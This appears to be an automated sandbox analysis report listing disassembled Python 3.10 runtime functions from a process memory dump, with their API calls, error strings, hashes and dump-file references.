                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\classobject.c
                                                                                                                                                                                                      • API String ID: 376477240-2515248907
                                                                                                                                                                                                      • Opcode ID: 67ef0ebbb5a4767abaeb320dc02c3458da1e78287bc8455c86ab180b4c11c377
                                                                                                                                                                                                      • Instruction ID: 6b27af31375a6858640223325218d26255a5b2b7b9857b779c68f5884e5fe7b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67ef0ebbb5a4767abaeb320dc02c3458da1e78287bc8455c86ab180b4c11c377
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B021CDB26106149FC711DF19C402E96B7F4FF8931AF00866AE8288BB50CB71E851CBC0
                                                                                                                                                                                                      Function 6C3CE8E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyObject_Call.PYTHON310(?,?,?,?,00000000,?,?,?,?,6C58A79B), ref: 6C3CE91F
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(in atexit callback,?,?,6C58A79B), ref: 6C3CE933
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallErr_Object_UnraisableWrite
                                                                                                                                                                                                      • String ID: in atexit callback
                                                                                                                                                                                                      • API String ID: 1178423042-782259124
                                                                                                                                                                                                      • Opcode ID: dc0dc4e6189c2590c10bee0190a379f3f9eb095545292674937af3c71120ae59
                                                                                                                                                                                                      • Instruction ID: 960f1daa68c511deec0da1c5be193a5f393200f2b6b7aec464e4789ad5984b78
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc0dc4e6189c2590c10bee0190a379f3f9eb095545292674937af3c71120ae59
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD11B6756057019BD2449E59DC82C6AB3B8EF86334714435CE568477A1DB26EC41CED2
                                                                                                                                                                                                      Function 6C4918E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,too many digits in integer,?,00000000,?,6C491A06,?,?,00000000,?,?,6C450F85,00000000), ref: 6C49190C
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • too many digits in integer, xrefs: 6C491905
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: too many digits in integer
                                                                                                                                                                                                      • API String ID: 1622067708-41470230
                                                                                                                                                                                                      • Opcode ID: fb3776e00ee393cf166c3faf1d9bf349999800970b2feb440b06898714c8acf8
                                                                                                                                                                                                      • Instruction ID: 34b2b0acd55ecd0cc009f2e0ecfa73ffb35e36a3e06cddfd2a0685c00afbfbc3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb3776e00ee393cf166c3faf1d9bf349999800970b2feb440b06898714c8acf8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49112C3270011447CA10EA69AC05BAA7BEDDBC527FF148676EC28C7F90EB31D818CAD1
                                                                                                                                                                                                      Function 6C47FC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long), ref: 6C47FC8A
                                                                                                                                                                                                      • PyFile_OpenCodeObject.PYTHON310(00000000), ref: 6C47FCB5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CodeErr_File_ObjectOpenString
                                                                                                                                                                                                      • String ID: input too long
                                                                                                                                                                                                      • API String ID: 2403841748-2786935005
                                                                                                                                                                                                      • Opcode ID: 7d1e796f43c366abe1440bde85f784bf58185daa661b3695a20165c0d4b46591
                                                                                                                                                                                                      • Instruction ID: ca9c018ba62996ffc709c094783871a721341280db206463bc0f158e2ce57f29
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d1e796f43c366abe1440bde85f784bf58185daa661b3695a20165c0d4b46591
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32016877B4511417E630C92DBC12FD67399CBC22BAF0843B5EC589BBC0EE116C0682E2
                                                                                                                                                                                                      Function 6C575E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long), ref: 6C575E7A
                                                                                                                                                                                                      • PyImport_AddModuleObject.PYTHON310(00000000), ref: 6C575EA5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Import_ModuleObjectString
                                                                                                                                                                                                      • String ID: input too long
                                                                                                                                                                                                      • API String ID: 161707315-2786935005
                                                                                                                                                                                                      • Opcode ID: daf06ffaf9bdaf1b8d1db361c41edcadce9b2adec1ec16a552be0e209b6f2ce1
                                                                                                                                                                                                      • Instruction ID: 7a16f18aa6e402e05ce4bafd0e091a58c16a10898cb73259262f9c5f4285a5b4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: daf06ffaf9bdaf1b8d1db361c41edcadce9b2adec1ec16a552be0e209b6f2ce1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C016873F0411017C630892DBC02BD67399CBC2279F5443B5EC588BBC0EE116C4682E2
                                                                                                                                                                                                      Function 6C579BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_PreInitializeFromConfig.PYTHON310(?,?,00000000), ref: 6C579C04
                                                                                                                                                                                                        • Part of subcall function 6C588900: _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C58893D
                                                                                                                                                                                                      • _PyMem_RawWcsdup.PYTHON310(?), ref: 6C579C28
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConfigFromInitInitializeMem_RuntimeState_Wcsdup
                                                                                                                                                                                                      • String ID: @bJl
                                                                                                                                                                                                      • API String ID: 392323462-3213955731
                                                                                                                                                                                                      • Opcode ID: c4b5c7e8d18c19552a5a31f4a3b9c76d8e9829f3d0a3d2112f669fc597241764
                                                                                                                                                                                                      • Instruction ID: 44e54133ba8387fd882109ed6b8bd4999d2b2aef075cb216ae06748d52412907
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4b5c7e8d18c19552a5a31f4a3b9c76d8e9829f3d0a3d2112f669fc597241764
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F511A3726002048FDB10DF19EC09B85BBF8EF95328F15C1A6EC5C8B361D7759994CBA1
                                                                                                                                                                                                      Function 6C58EAE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_allocate_lock.PYTHON310(?,6C48BCD6,?), ref: 6C58EAF3
                                                                                                                                                                                                        • Part of subcall function 6C5BC510: CreateSemaphoreA.KERNEL32(00000000,00000000,000186A0,00000000), ref: 6C5BC547
                                                                                                                                                                                                        • Part of subcall function 6C5BC510: InitializeCriticalSection.KERNEL32(00000000), ref: 6C5BC55C
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E920,00000000,00000000,00000000,00000000,?,6C48BCD6,?), ref: 6C58EB20
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • failed to create init interpreter ID mutex, xrefs: 6C58EB0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateCriticalErr_InitializeObjectSectionSemaphoreThread_allocate_lock
                                                                                                                                                                                                      • String ID: failed to create init interpreter ID mutex
                                                                                                                                                                                                      • API String ID: 3895777646-3592896636
                                                                                                                                                                                                      • Opcode ID: 88b1b37da7676e2160669fb3d7bd71945bde0ffa3d0fa1df60366e35f239785f
                                                                                                                                                                                                      • Instruction ID: c9f8b19007c604c242e111c21f4e311dc14bb3180b611ebccce9ad8f58ec4f12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88b1b37da7676e2160669fb3d7bd71945bde0ffa3d0fa1df60366e35f239785f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 190128B66052155FD7108E6A9C41A6373FCEB45239F040368EC18C7AC0EBB0EC0587E1
                                                                                                                                                                                                      Function 6C5BCA90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyStructSequence_InitType.PYTHON310(6C77A670,6C74E320,00000000,00000000,?,?,6C5BAF7C), ref: 6C5BCAAD
                                                                                                                                                                                                      • PyStructSequence_New.PYTHON310(6C77A670,00000000,?,?,6C5BAF7C), ref: 6C5BCABE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sequence_Struct$InitType
                                                                                                                                                                                                      • String ID: ol
                                                                                                                                                                                                      • API String ID: 1895247342-2246494270
                                                                                                                                                                                                      • Opcode ID: 407d23117659fc58ea28ea3d2a21fcedfa5c6a0ca2d2de31c22599c2a4f5cb9b
                                                                                                                                                                                                      • Instruction ID: c72241b4a40e31dfc580836b1be66bb2fbd5340d3cc689ad0ceac8aeaf08ed2d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 407d23117659fc58ea28ea3d2a21fcedfa5c6a0ca2d2de31c22599c2a4f5cb9b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C401247164060447D230EAA46C16B5236E49B05238F000329DD68E6BA1EBB1F514CAE6
                                                                                                                                                                                                      Function 6C4AAF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_GenericAlloc.PYTHON310(?,00000000), ref: 6C4AAF0B
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(a bytes-like object is required, not '%.100s',00000000), ref: 6C4AAF61
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • a bytes-like object is required, not '%.100s', xrefs: 6C4AAF56
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocErr_FormatGenericType_
                                                                                                                                                                                                      • String ID: a bytes-like object is required, not '%.100s'
                                                                                                                                                                                                      • API String ID: 66934820-1572320264
                                                                                                                                                                                                      • Opcode ID: 6446ac7b26690a9fd964c389a2939787451ca878b13ee0796b46b85715d3110a
                                                                                                                                                                                                      • Instruction ID: e9743d4fd5a3f9150680c2505e52198d1c2d4ab41a88230a61abd38a8a5920c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6446ac7b26690a9fd964c389a2939787451ca878b13ee0796b46b85715d3110a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5201D4B57012019BD718DE95EC14F9277A4EF0476AF118128FD18C7B60D735E801CBD0
                                                                                                                                                                                                      Function 6C48DB70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000001F1), ref: 6C48DB9E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C48DB92
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C48DB8D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1334166624
                                                                                                                                                                                                      • Opcode ID: c8e3e00bff3d7b94819334e4a34dba38bcf107c3ab9f9ba7b0df9bf5cb70554a
                                                                                                                                                                                                      • Instruction ID: 919fbcc5fae12c443515f09cdba697566306123211471c88820c2d3a7a2789c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e3e00bff3d7b94819334e4a34dba38bcf107c3ab9f9ba7b0df9bf5cb70554a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A101D6B2706606ABCB08EA55E890C9B77B6AFC4B25B04842EF51E47E40EB30E94187C1
                                                                                                                                                                                                      Function 6C550CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(bad argument type for built-in operation), ref: 6C550D2C
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,bad argument type for built-in operation), ref: 6C550D36
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyList_New.PYTHON310(00000000,00000000,?,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?,?), ref: 6C553637
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyCMethod_New.PYTHON310(6C74DD84,00000000,00000000,00000000,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?), ref: 6C5536A2
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyUnicode_FromString.PYTHON310(encodings,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C55374A
